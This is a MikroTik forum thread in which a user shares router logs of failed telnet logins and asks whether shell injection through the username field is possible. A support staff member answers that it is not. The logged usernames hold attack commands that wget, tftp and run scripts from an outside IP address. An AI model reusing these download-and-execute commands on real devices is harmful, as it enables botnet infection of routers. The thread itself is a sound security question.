Community discussions

MikroTik App
 
exa
newbie
Topic Author
Posts: 37
Joined: Sat Jul 04, 2009 2:07 pm

Login security - possible username shellcode injection?

Mon Jun 13, 2016 11:52 am

Hi everyone,

we just saw this in one of our routers' logs:
system,error,critical login failure for user cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://208.67.1.91/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 208 from 122.52.113.24 via telnet
system,error,critical login failure for user .67.1.91 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 208.67.1.91; chmod 777 tftp2.sh; sh tftp2.sh; rm from 122.52.113.24 via telnet
Looks like someone's trying to inject malicious code via username. I wouldn't get excited, but the fact that the beginning of the second message looks truncated hints that the injection could actually work. If it was checked in wrongly quoted bash, well, we'd be seriously fucked up.

Could anyone from Mikrotik please reliably investigate/acknowledge/deny the possibility of this type of code injection? Version is quite recent (6.32.2). If the injection wasn't be possible, I highly doubt the scriptkids would even care to send such logins....

Thanks in advance,
-mk
 
User avatar
mrz
MikroTik Support
MikroTik Support
Posts: 6045
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia
Contact:

Re: Login security - possible username shellcode injection?

Mon Jun 13, 2016 3:41 pm

Don't worry. It is not possible to access shell in such way.

Who is online

Users browsing this forum: Google [Bot] and 61 guests